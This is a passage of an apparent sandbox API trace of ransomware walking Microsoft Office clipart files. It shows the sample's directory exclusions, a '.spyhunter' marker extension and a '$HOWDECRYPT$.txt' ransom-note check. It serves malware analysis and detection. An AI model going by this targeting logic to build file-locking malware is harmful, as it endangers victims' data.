FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.625] lstrcmpiW (lpString1="FD00336_.WMF", lpString2="Windows") returned -1 [0097.625] lstrlenW (lpString="Windows") returned 7 [0097.626] lstrcmpiW (lpString1="FD00336_.WMF", lpString2="$Recycle.bin") returned 1 [0097.626] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.626] lstrcmpiW (lpString1="FD00336_.WMF", lpString2="System Volume Information") returned -1 [0097.626] lstrlenW (lpString="System Volume Information") returned 25 [0097.626] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 67 [0097.626] StrStrIW (lpFirst="FD00336_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.626] lstrcmpW (lpString1="FD00336_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.626] lstrcmpW (lpString1="FD00336_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.626] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 67 [0097.626] GetProcessHeap () returned 0x2c0000 [0097.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c15f68 [0097.626] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1cd8) returned 0x2c310e0 [0097.626] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.626] lstrcmpiW (lpString1="FD00361_.WMF", lpString2="Windows") returned -1 [0097.626] lstrlenW (lpString="Windows") returned 7 [0097.626] lstrcmpiW (lpString1="FD00361_.WMF", lpString2="$Recycle.bin") returned 1 [0097.626] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.626] lstrcmpiW (lpString1="FD00361_.WMF", lpString2="System Volume Information") returned -1 [0097.626] lstrlenW (lpString="System Volume Information") returned 25 [0097.626] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 67 [0097.626] StrStrIW (lpFirst="FD00361_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.626] lstrcmpW (lpString1="FD00361_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.626] lstrcmpW (lpString1="FD00361_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.626] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 67 [0097.626] GetProcessHeap () returned 0x2c0000 [0097.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c16038 [0097.627] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ce0) returned 0x2c310e0 [0097.627] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.627] lstrcmpiW (lpString1="FD00369_.WMF", lpString2="Windows") returned -1 [0097.627] lstrlenW (lpString="Windows") returned 7 [0097.627] lstrcmpiW (lpString1="FD00369_.WMF", lpString2="$Recycle.bin") returned 1 [0097.627] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.627] lstrcmpiW (lpString1="FD00369_.WMF", lpString2="System Volume Information") returned -1 [0097.627] lstrlenW (lpString="System Volume Information") returned 25 [0097.627] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 67 [0097.627] StrStrIW (lpFirst="FD00369_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.627] lstrcmpW (lpString1="FD00369_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.627] lstrcmpW (lpString1="FD00369_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.627] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 67 [0097.627] GetProcessHeap () returned 0x2c0000 [0097.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c16108 [0097.627] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ce8) returned 0x2c310e0 [0097.627] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.627] lstrcmpiW (lpString1="FD00382_.WMF", lpString2="Windows") returned -1 [0097.627] lstrlenW (lpString="Windows") returned 7 [0097.627] lstrcmpiW (lpString1="FD00382_.WMF", lpString2="$Recycle.bin") returned 1 [0097.627] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.627] lstrcmpiW (lpString1="FD00382_.WMF", lpString2="System Volume Information") returned -1 [0097.627] lstrlenW (lpString="System Volume Information") returned 25 [0097.627] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 67 [0097.627] StrStrIW (lpFirst="FD00382_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.627] lstrcmpW (lpString1="FD00382_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.627] lstrcmpW (lpString1="FD00382_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.628] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 67 [0097.628] GetProcessHeap () returned 0x2c0000 [0097.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c161d8 [0097.628] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1cf0) returned 0x2c310e0 [0097.628] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.628] lstrcmpiW (lpString1="FD00397_.WMF", lpString2="Windows") returned -1 [0097.628] lstrlenW (lpString="Windows") returned 7 [0097.628] lstrcmpiW (lpString1="FD00397_.WMF", lpString2="$Recycle.bin") returned 1 [0097.628] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.628] lstrcmpiW (lpString1="FD00397_.WMF", lpString2="System Volume Information") returned -1 [0097.628] lstrlenW (lpString="System Volume Information") returned 25 [0097.628] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 67 [0097.628] StrStrIW (lpFirst="FD00397_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.628] lstrcmpW (lpString1="FD00397_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.628] lstrcmpW (lpString1="FD00397_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.628] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 67 [0097.628] GetProcessHeap () returned 0x2c0000 [0097.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c162a8 [0097.628] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1cf8) returned 0x2c310e0 [0097.628] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.631] lstrcmpiW (lpString1="FD00403_.WMF", lpString2="Windows") returned -1 [0097.631] lstrlenW (lpString="Windows") returned 7 [0097.631] lstrcmpiW (lpString1="FD00403_.WMF", lpString2="$Recycle.bin") returned 1 [0097.631] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.631] lstrcmpiW (lpString1="FD00403_.WMF", lpString2="System Volume Information") returned -1 [0097.631] lstrlenW (lpString="System Volume Information") returned 25 [0097.631] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 67 [0097.631] StrStrIW (lpFirst="FD00403_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.631] lstrcmpW (lpString1="FD00403_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.631] lstrcmpW (lpString1="FD00403_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.631] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 67 [0097.631] GetProcessHeap () returned 0x2c0000 [0097.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c16378 [0097.632] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d00) returned 0x2c310e0 [0097.632] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.632] lstrcmpiW (lpString1="FD00414_.WMF", lpString2="Windows") returned -1 [0097.632] lstrlenW (lpString="Windows") returned 7 [0097.632] lstrcmpiW (lpString1="FD00414_.WMF", lpString2="$Recycle.bin") returned 1 [0097.632] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.632] lstrcmpiW (lpString1="FD00414_.WMF", lpString2="System Volume Information") returned -1 [0097.632] lstrlenW (lpString="System Volume Information") returned 25 [0097.632] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 67 [0097.632] StrStrIW (lpFirst="FD00414_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.632] lstrcmpW (lpString1="FD00414_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.632] lstrcmpW (lpString1="FD00414_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.632] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 67 [0097.632] GetProcessHeap () returned 0x2c0000 [0097.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c16448 [0097.632] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d08) returned 0x2c310e0 [0097.632] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.632] lstrcmpiW (lpString1="FD00419_.WMF", lpString2="Windows") returned -1 [0097.632] lstrlenW (lpString="Windows") returned 7 [0097.632] lstrcmpiW (lpString1="FD00419_.WMF", lpString2="$Recycle.bin") returned 1 [0097.632] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.632] lstrcmpiW (lpString1="FD00419_.WMF", lpString2="System Volume Information") returned -1 [0097.632] lstrlenW (lpString="System Volume Information") returned 25 [0097.632] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 67 [0097.632] StrStrIW (lpFirst="FD00419_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.632] lstrcmpW (lpString1="FD00419_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.633] lstrcmpW (lpString1="FD00419_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.633] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 67 [0097.633] GetProcessHeap () returned 0x2c0000 [0097.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c16518 [0097.633] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d10) returned 0x2c310e0 [0097.633] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.633] lstrcmpiW (lpString1="FD00428_.WMF", lpString2="Windows") returned -1 [0097.633] lstrlenW (lpString="Windows") returned 7 [0097.633] lstrcmpiW (lpString1="FD00428_.WMF", lpString2="$Recycle.bin") returned 1 [0097.633] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.633] lstrcmpiW (lpString1="FD00428_.WMF", lpString2="System Volume Information") returned -1 [0097.633] lstrlenW (lpString="System Volume Information") returned 25 [0097.633] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 67 [0097.633] StrStrIW (lpFirst="FD00428_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.633] lstrcmpW (lpString1="FD00428_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.633] lstrcmpW (lpString1="FD00428_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.633] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 67 [0097.633] GetProcessHeap () returned 0x2c0000 [0097.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c165e8 [0097.633] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d18) returned 0x2c310e0 [0097.633] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.633] lstrcmpiW (lpString1="FD00435_.WMF", lpString2="Windows") returned -1 [0097.633] lstrlenW (lpString="Windows") returned 7 [0097.633] lstrcmpiW (lpString1="FD00435_.WMF", lpString2="$Recycle.bin") returned 1 [0097.633] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.633] lstrcmpiW (lpString1="FD00435_.WMF", lpString2="System Volume Information") returned -1 [0097.634] lstrlenW (lpString="System Volume Information") returned 25 [0097.634] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 67 [0097.634] StrStrIW (lpFirst="FD00435_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.634] lstrcmpW (lpString1="FD00435_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.634] lstrcmpW (lpString1="FD00435_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.634] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 67 [0097.634] GetProcessHeap () returned 0x2c0000 [0097.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c166b8 [0097.634] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d20) returned 0x2c310e0 [0097.634] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.634] lstrcmpiW (lpString1="FD00438_.WMF", lpString2="Windows") returned -1 [0097.634] lstrlenW (lpString="Windows") returned 7 [0097.634] lstrcmpiW (lpString1="FD00438_.WMF", lpString2="$Recycle.bin") returned 1 [0097.634] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.634] lstrcmpiW (lpString1="FD00438_.WMF", lpString2="System Volume Information") returned -1 [0097.634] lstrlenW (lpString="System Volume Information") returned 25 [0097.634] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 67 [0097.634] StrStrIW (lpFirst="FD00438_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.634] lstrcmpW (lpString1="FD00438_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.634] lstrcmpW (lpString1="FD00438_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.634] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 67 [0097.634] GetProcessHeap () returned 0x2c0000 [0097.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c16788 [0097.634] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d28) returned 0x2c310e0 [0097.635] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.635] lstrcmpiW (lpString1="FD00455_.WMF", lpString2="Windows") returned -1 [0097.635] lstrlenW (lpString="Windows") returned 7 [0097.635] lstrcmpiW (lpString1="FD00455_.WMF", lpString2="$Recycle.bin") returned 1 [0097.635] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.635] lstrcmpiW (lpString1="FD00455_.WMF", lpString2="System Volume Information") returned -1 [0097.635] lstrlenW (lpString="System Volume Information") returned 25 [0097.635] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 67 [0097.635] StrStrIW (lpFirst="FD00455_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.635] lstrcmpW (lpString1="FD00455_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.635] lstrcmpW (lpString1="FD00455_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.635] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 67 [0097.635] GetProcessHeap () returned 0x2c0000 [0097.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c190f0 [0097.635] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d30) returned 0x2c310e0 [0097.635] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.635] lstrcmpiW (lpString1="FD00459_.WMF", lpString2="Windows") returned -1 [0097.635] lstrlenW (lpString="Windows") returned 7 [0097.635] lstrcmpiW (lpString1="FD00459_.WMF", lpString2="$Recycle.bin") returned 1 [0097.635] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.635] lstrcmpiW (lpString1="FD00459_.WMF", lpString2="System Volume Information") returned -1 [0097.635] lstrlenW (lpString="System Volume Information") returned 25 [0097.635] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 67 [0097.635] StrStrIW (lpFirst="FD00459_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.636] lstrcmpW (lpString1="FD00459_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.636] lstrcmpW (lpString1="FD00459_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.636] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 67 [0097.636] GetProcessHeap () returned 0x2c0000 [0097.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c191c0 [0097.636] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d38) returned 0x2c310e0 [0097.636] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.636] lstrcmpiW (lpString1="FD00543_.WMF", lpString2="Windows") returned -1 [0097.636] lstrlenW (lpString="Windows") returned 7 [0097.636] lstrcmpiW (lpString1="FD00543_.WMF", lpString2="$Recycle.bin") returned 1 [0097.636] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.636] lstrcmpiW (lpString1="FD00543_.WMF", lpString2="System Volume Information") returned -1 [0097.636] lstrlenW (lpString="System Volume Information") returned 25 [0097.636] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 67 [0097.636] StrStrIW (lpFirst="FD00543_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.636] lstrcmpW (lpString1="FD00543_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.636] lstrcmpW (lpString1="FD00543_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.636] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 67 [0097.636] GetProcessHeap () returned 0x2c0000 [0097.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c19290 [0097.636] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d40) returned 0x2c310e0 [0097.636] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.636] lstrcmpiW (lpString1="FD00544_.WMF", lpString2="Windows") returned -1 [0097.636] lstrlenW (lpString="Windows") returned 7 [0097.637] lstrcmpiW (lpString1="FD00544_.WMF", lpString2="$Recycle.bin") returned 1 [0097.637] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.637] lstrcmpiW (lpString1="FD00544_.WMF", lpString2="System Volume Information") returned -1 [0097.637] lstrlenW (lpString="System Volume Information") returned 25 [0097.637] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 67 [0097.637] StrStrIW (lpFirst="FD00544_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.637] lstrcmpW (lpString1="FD00544_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.637] lstrcmpW (lpString1="FD00544_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.637] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 67 [0097.637] GetProcessHeap () returned 0x2c0000 [0097.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c19360 [0097.637] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d48) returned 0x2c310e0 [0097.637] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.637] lstrcmpiW (lpString1="FD00564_.WMF", lpString2="Windows") returned -1 [0097.637] lstrlenW (lpString="Windows") returned 7 [0097.637] lstrcmpiW (lpString1="FD00564_.WMF", lpString2="$Recycle.bin") returned 1 [0097.637] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.637] lstrcmpiW (lpString1="FD00564_.WMF", lpString2="System Volume Information") returned -1 [0097.637] lstrlenW (lpString="System Volume Information") returned 25 [0097.637] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 67 [0097.637] StrStrIW (lpFirst="FD00564_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.638] lstrcmpW (lpString1="FD00564_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.638] lstrcmpW (lpString1="FD00564_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.638] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 67 [0097.638] GetProcessHeap () returned 0x2c0000 [0097.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c19430 [0097.638] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d50) returned 0x2c310e0 [0097.638] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.638] lstrcmpiW (lpString1="FD00586_.WMF", lpString2="Windows") returned -1 [0097.638] lstrlenW (lpString="Windows") returned 7 [0097.638] lstrcmpiW (lpString1="FD00586_.WMF", lpString2="$Recycle.bin") returned 1 [0097.638] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.638] lstrcmpiW (lpString1="FD00586_.WMF", lpString2="System Volume Information") returned -1 [0097.638] lstrlenW (lpString="System Volume Information") returned 25 [0097.638] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 67 [0097.638] StrStrIW (lpFirst="FD00586_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.638] lstrcmpW (lpString1="FD00586_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.638] lstrcmpW (lpString1="FD00586_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.638] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 67 [0097.638] GetProcessHeap () returned 0x2c0000 [0097.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c19500 [0097.638] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d58) returned 0x2c310e0 [0097.638] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.638] lstrcmpiW (lpString1="FD00775_.WMF", lpString2="Windows") returned -1 [0097.638] lstrlenW (lpString="Windows") returned 7 [0097.638] lstrcmpiW (lpString1="FD00775_.WMF", lpString2="$Recycle.bin") returned 1 [0097.638] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.638] lstrcmpiW (lpString1="FD00775_.WMF", lpString2="System Volume Information") returned -1 [0097.639] lstrlenW (lpString="System Volume Information") returned 25 [0097.639] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 67 [0097.639] StrStrIW (lpFirst="FD00775_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.639] lstrcmpW (lpString1="FD00775_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.639] lstrcmpW (lpString1="FD00775_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.639] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 67 [0097.639] GetProcessHeap () returned 0x2c0000 [0097.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c195d0 [0097.639] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d60) returned 0x2c310e0 [0097.639] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.639] lstrcmpiW (lpString1="FD00779_.WMF", lpString2="Windows") returned -1 [0097.639] lstrlenW (lpString="Windows") returned 7 [0097.639] lstrcmpiW (lpString1="FD00779_.WMF", lpString2="$Recycle.bin") returned 1 [0097.639] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.639] lstrcmpiW (lpString1="FD00779_.WMF", lpString2="System Volume Information") returned -1 [0097.639] lstrlenW (lpString="System Volume Information") returned 25 [0097.639] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 67 [0097.639] StrStrIW (lpFirst="FD00779_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.639] lstrcmpW (lpString1="FD00779_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.639] lstrcmpW (lpString1="FD00779_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.639] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 67 [0097.639] GetProcessHeap () returned 0x2c0000 [0097.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c196a0 [0097.639] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1d68) returned 0x2c310e0 [0097.639] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.639] lstrcmpiW (lpString1="FD00799_.WMF", lpString2="Windows") returned -1 [0097.640] lstrlenW (lpString="Windows") returned 